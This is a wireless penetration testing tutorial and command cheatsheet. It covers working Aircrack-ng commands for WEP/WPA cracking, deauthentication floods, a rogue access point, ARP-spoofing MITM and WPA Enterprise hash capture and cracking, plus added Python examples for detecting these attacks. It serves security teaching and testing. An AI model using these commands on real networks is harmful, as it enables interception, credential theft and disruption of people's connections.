Wireless Penetration Testing Cheatsheet

Wireless Penetration Testing Tutorial: A Command Guide


Updated on August 11, 2025

Welcome to our comprehensive wireless penetration testing tutorial. This guide provides a practical command reference for ethical hackers and security professionals. Before proceeding, ensure you have explicit permission to test the target network, as unauthorized access is illegal. These WiFi security testing techniques are for educational and professional purposes only. 



Understanding the Basics: Changing Your MAC Address

An essential first step in any network assessment is to change your device's MAC address. This helps anonymize your hardware and bypass basic MAC filtering. You can use tools like `macchanger` or the `ifconfig` command.

Using `macchanger`:

macchanger -m aa:bb:cc:11:22:33 wlan0

Alternatively, use `ifconfig`:

ifconfig eth0 down
ifconfig eth0 hw ether aa:bb:cc:11:22:33
ifconfig eth0 up


Cracking WEP Encryption

WEP (Wired Equivalent Privacy) is an outdated and insecure protocol. Cracking it involves collecting a sufficient number of weak Initialization Vectors (IVs) using the Aircrack-ng suite, an essential toolset covered in many Wifi Hacking tutorials.

  1. Start Monitor Mode: Put your wireless card into monitor mode to capture all traffic.
    airmon-ng start wlan0
  2. Discover Networks: Scan for available wireless networks to identify your target's BSSID and channel.
    airodump-ng wlan0mon
  3. Capture IV Packets: Focus on the target network and save the captured packets to a file. Do not close this terminal.
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 -w PacketCapture wlan0mon
  4. Crack the Password: Once enough data packets (IVs) are collected, use aircrack-ng to analyze the capture file and reveal the key.
    aircrack-ng PacketCapture*.cap


Cracking WPA/WPA2 PSK Encryption

WPA/WPA2 with a Pre-Shared Key (PSK) is significantly more secure than WEP. The primary attack vector is to capture the four-way WPA2 handshake that occurs when a client authenticates. This process is a core component of any modern wireless penetration testing exercise.

  1. Stop Network Services: Prevent interference from your system's network manager.
    service network-manager stop
  2. Start Monitor Mode:
    airmon-ng start wlan0
  3. Discover Networks:
    airodump-ng wlan0mon
  4. Capture the Handshake: Target the specific network and wait for a "WPA handshake" message to appear in the top right of the terminal.
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 -w wpadump wlan0mon
  5. Force Re-authentication (Optional): To speed up the process, you can de-authenticate a connected client, forcing them to reconnect and generate a new handshake.
    aireplay-ng --deauth 50 -a [router_MAC_Address] -c [Victim_MAC_Station] wlan0mon
  6. Crack the Password: Once the handshake is captured, stop airodump-ng (`Ctrl+C`) and run an offline dictionary attack against the capture file.
    aircrack-ng -w wordlist.txt wpadump*.cap

For more details on network protocols, you can consult resources from the IEEE. Additionally, you can learn more about captive portal pentesting techniques on our blog.
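To show why the offline dictionary attack in step 6 works at all, and why its cost depends on the passphrase rather than on further access to the network, here is an added Python example (not from the original post or the Aircrack-ng project) that derives the WPA/WPA2 Pairwise Master Key the way the standard defines it and checks it against the IEEE 802.11 Annex H test vector; the wordlist and the SSID "GuestNet" are constructed for the example.

```python
import hashlib
import time

PBKDF2_ROUNDS = 4096   # fixed by the WPA/WPA2-Personal standard (IEEE 802.11i)
PMK_LEN = 32           # 256-bit Pairwise Master Key


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits).
    This is the expensive step a cracker repeats for every wordlist entry."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, PMK_LEN)


def find_passphrase(ssid: str, target_pmk: bytes, wordlist):
    """Offline search in the spirit of `aircrack-ng -w wordlist.txt`: return
    the first wordlist entry whose PMK matches, or None. A real cracker has
    no PMK to compare against; it recomputes the handshake MIC from each
    candidate PMK instead, which is the same amount of PBKDF2 work."""
    for word in wordlist:
        if derive_pmk(word, ssid) == target_pmk:
            return word
    return None


def candidates_per_second(ssid: str, sample: int = 200) -> float:
    """Rough single-core throughput; the 4096 rounds are what make long,
    random passphrases impractical to guess offline."""
    start = time.perf_counter()
    for i in range(sample):
        derive_pmk(f"candidate-{i}", ssid)
    return sample / (time.perf_counter() - start)


if __name__ == "__main__":
    # IEEE 802.11-2007 Annex H.4 test vector: passphrase "password", SSID "IEEE"
    print(derive_pmk("password", "IEEE").hex())
    # Constructed wordlist. The SSID is the salt, so a PMK table built for
    # one SSID says nothing about a network with a different name.
    pmk = derive_pmk("password", "IEEE")
    words = ["letmein", "password", "hunter2"]
    print(find_passphrase("IEEE", pmk, words))       # password
    print(find_passphrase("GuestNet", pmk, words))   # None
    print(f"~{candidates_per_second('IEEE'):.0f} candidates/s on one core")
```

The per-SSID salt is why rainbow tables for WPA only exist for a handful of common SSIDs, and why a unique SSID plus a long random passphrase is the practical defence against this step.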


Eavesdropping on a Wireless Network

If you already have the network password, you can decrypt live traffic to see the data being transmitted by other users on the network.

  1. Kill Conflicting Processes: Use `airmon-ng check kill` to stop any processes that might interfere with monitor mode.
    airmon-ng check kill
    airmon-ng start wlan0
  2. Capture Encrypted Data: Use airodump-ng to capture a large amount of data from the target network.
    airodump-ng --bssid 00:11:22:33:44:55 --channel [Channel_Number] -w wpadump wlan0mon
  3. Decrypt the Traffic: Use `airdecap-ng` with the known network password to decrypt the packet capture file.

    For WEP (key must be in hexadecimal):

    airdecap-ng -w [WEP_Password_in_Hex] wepdump.cap

    For WPA/WPA2:

    airdecap-ng -p [WPA_Password] wpadump.cap
  4. Analyze Traffic: Open the newly created `wpadump-dec.cap` file (airdecap-ng appends `-dec` to the input file name) in Wireshark to analyze the decrypted traffic.


Setting up a Rogue Access Point Manually

A Rogue Access Point setup creates a malicious Wi-Fi network that appears legitimate, tricking users into connecting. This allows an attacker to intercept or manipulate their traffic.

  1. Enable Monitor Mode and Assign IP:
    airmon-ng start wlan0
    ifconfig wlan0mon 10.0.0.1/24
  2. Install Required Tools:
    sudo apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
  3. Configure `dnsmasq`: Backup the original file and create a new one to act as our DHCP and DNS server.
    mv /etc/dnsmasq.conf /etc/dnsmasq.conf_backup
    nano /etc/dnsmasq.conf

    Add the following content to `dnsmasq.conf`:

    log-facility=/var/log/dnsmasq.log
    #Redirect all DNS lookups to our machine (# matches any domain)
    #address=/#/10.0.0.1
    #Redirect only google.com to our machine
    #address=/google.com/10.0.0.1
    interface=wlan0mon
    dhcp-range=10.0.0.10,10.0.0.250,12h
    #Gateway (DHCP option 3)
    dhcp-option=3,10.0.0.1
    #DNS server (DHCP option 6)
    dhcp-option=6,10.0.0.1
    #no-resolv
    log-queries
  4. Configure `hostapd`: Create a configuration file that defines our fake access point.
    nano /etc/hostapd/hostapd.conf

    Add this content:

    interface=wlan0mon
    driver=nl80211
    ssid=FreeWifiHotspot
    channel=1
    #enable_karma=1
  5. Start the Services:
    service dnsmasq start 
    hostapd /etc/hostapd/hostapd.conf

    Your rogue access point is now active. You can monitor connected clients' DNS queries in `/var/log/dnsmasq.log` or capture all traffic on the `wlan0mon` interface with Wireshark.


Performing a Man-in-the-Middle (MITM) Attack

A Man-in-the-Middle (MITM) attack positions the attacker between the user and the router, allowing for traffic interception and manipulation. The following commands demonstrate two common methods.

Method 1: Using a Rogue AP with IP Forwarding

First, set up the rogue access point as described in the previous section. Then, configure your system to forward traffic from the victims to the real internet.

  1. Configure `iptables` for NAT:
    #flush existing NAT and filter rules
    iptables -t nat -F
    iptables -F

    #masquerade (NAT) outbound traffic on the interface that has internet access
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    #forward packets arriving from the rogue AP interface out to the internet
    iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
  2. Enable IP Forwarding:
    echo '1' > /proc/sys/net/ipv4/ip_forward

Method 2: Using ARP Spoofing

ARP spoofing tricks devices on a local network into sending their traffic to the attacker's machine instead of the legitimate gateway. These Man-in-the-Middle attack commands are very effective on switched networks.

  1. Install Tools:
    # For Debian/Ubuntu
    sudo apt-get install dsniff
    
    # For Arch
    pacman -S dsniff
  2. Enable IP Forwarding:
    sysctl -w net.ipv4.ip_forward=1
  3. Identify Targets: View the local ARP table to find the IP and MAC addresses of the victim and gateway.
    arp -a
  4. Start ARP Spoofing: You need two separate terminal windows for this.

    In the first terminal, poison the victim's ARP cache:

    arpspoof -i ens33 -t [Target_IP] [Gateway_IP]

    In the second terminal, poison the gateway's ARP cache:

    arpspoof -i ens33 -t [Gateway_IP] [Target_IP]
  5. Capture Traffic: With ARP spoofing active, open Wireshark and start capturing packets on your interface (e.g., `ens33`). You can filter by the victim's IP address to see their traffic.
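As an added example, not part of the original post, the following Python script shows how the two `arpspoof` commands above look to a defender watching ARP replies on the segment; the IPs, MACs and timestamps in the sample are constructed, and the detection logic is this example's own rather than any dsniff feature.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen by a passive sensor on the LAN:
# (seconds, IP the sender claims to own, sender MAC). Gateway 192.168.1.1,
# victim 192.168.1.20, attacker MAC 00:0c:29:aa:bb:cc; all values are made up.
SAMPLE_REPLIES = [
    (0.0, "192.168.1.1",  "f0:9f:c2:11:22:33"),   # real gateway answers
    (0.5, "192.168.1.20", "3c:22:fb:44:55:66"),   # real victim answers
    (1.0, "192.168.1.30", "a4:5e:60:77:88:99"),   # unrelated host
    (5.0, "192.168.1.1",  "00:0c:29:aa:bb:cc"),   # arpspoof -t victim gateway
    (5.0, "192.168.1.20", "00:0c:29:aa:bb:cc"),   # arpspoof -t gateway victim
    (7.0, "192.168.1.1",  "00:0c:29:aa:bb:cc"),   # arpspoof repeats every ~2 s
]


def detect_arp_spoofing(replies, trusted=None):
    """Return alert strings for two symptoms of the attack above:
      1. an IP whose MAC binding changes (also fires on a legitimate DHCP
         reassignment, so treat it as a weak signal on its own);
      2. one MAC claiming more than one IP, which is what happens when the
         attacker answers for both the gateway and the victim.
    `trusted` can seed known IP->MAC bindings, e.g. the gateway's real MAC."""
    ip_to_mac = dict(trusted or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(f"t={ts:.1f}s {ip} moved from {known} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"t={ts:.1f}s {mac} now claims "
                              f"{sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES):
        print(line)
```

Static ARP entries for the gateway, or Dynamic ARP Inspection on managed switches, stop the poisoning itself; this kind of monitor only tells you it is happening.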


Executing a Denial of Service (DoS) Attack

A wireless DoS attack can disrupt service by repeatedly sending de-authentication frames to a client, forcing them to disconnect from the access point. This leverages the same mechanism used to capture a WPA handshake but repeats it indefinitely.

  1. Enable Monitor Mode and Scan:
    airmon-ng start wlan0
    airodump-ng wlan0mon
  2. Target a Client: Use `aireplay-ng` to continuously de-authenticate a specific client. `--deauth` selects the deauthentication attack, and the count that follows it (`5000` here) is how many times the deauth frames are sent.
    aireplay-ng --deauth 5000 -a [router_MAC_Address] -c [Victim_MAC_Station] wlan0mon
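The following Python example is added here (not from the original post or Aircrack-ng) to show what the `--deauth 5000` flood looks like on the wire and how a wireless IDS flags it with a sliding-window count per BSSID; the frame sample, addresses and threshold are constructed for the example.

```python
from collections import defaultdict, deque

# 802.11 management frame subtypes (frame control subtype field)
DEAUTH = 0x0C
DISASSOC = 0x0A
BEACON = 0x08

# Constructed capture: (seconds, subtype, BSSID, destination). One deauth at
# t=2 s is a normal roam; the 40 frames from t=6 s are the flood. Made up.
AP = "00:11:22:33:44:55"
CLIENT = "3c:22:fb:44:55:66"
SAMPLE_FRAMES = (
    [(i * 0.1, BEACON, AP, "ff:ff:ff:ff:ff:ff") for i in range(100)]
    + [(2.0, DEAUTH, AP, CLIENT)]
    + [(6.0 + i * 0.01, DEAUTH, AP, CLIENT) for i in range(40)]
)


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Return {bssid: time_first_flagged} for every BSSID that sources at
    least `threshold` deauth/disassoc frames within any `window_s` window.
    The threshold is a tuning choice: a busy AP legitimately emits a few per
    minute, a deauth tool emits dozens per second."""
    recent = defaultdict(deque)       # bssid -> timestamps still in window
    flagged = {}
    for ts, subtype, bssid, _dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        window = recent[bssid]
        window.append(ts)
        while ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold and bssid not in flagged:
            flagged[bssid] = ts
    return flagged


if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE_FRAMES[:101]))   # {} : no flood
    print(detect_deauth_flood(SAMPLE_FRAMES))         # {'00:11:22:33:44:55': 6.09}
```

The durable mitigation is 802.11w Protected Management Frames, which authenticates deauthentication and disassociation frames so that forged ones are discarded by the client.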


Testing WPA Enterprise Security

WPA Enterprise uses a RADIUS server for authentication instead of a PSK. An attack involves setting up a fake AP to capture the MS-CHAPv2 challenge/response hash and then cracking it offline.

  1. Install hostapd-wpe:
    apt-get update 
    apt-get install hostapd-wpe
  2. Configure hostapd-wpe: Edit the configuration file to match the target network's SSID.
    leafpad /etc/hostapd-wpe/hostapd-wpe.conf

    Inside the file, modify the `ssid` line to match the target enterprise network:

    ssid=NameOftheNetwork
  3. Launch the Fake AP: Stop the network manager and start the WPE-enabled access point.
    service network-manager stop 
    hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

    When a victim connects, you will capture their username and the MS-CHAPv2 challenge/response pair.

  4. Crack the Hash: Use `asleap` with the captured challenge, response, and a wordlist to crack the user's password.
    asleap -C [challenge_code] -R [response_code] -W wordlist.txt

Always remember to follow ethical guidelines.


Wireless Penetration Testing, Cybersecurity, Aircrack-ng, Ethical Hacking, WPA Cracking, MITM Attack, Kali Linux Commands
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
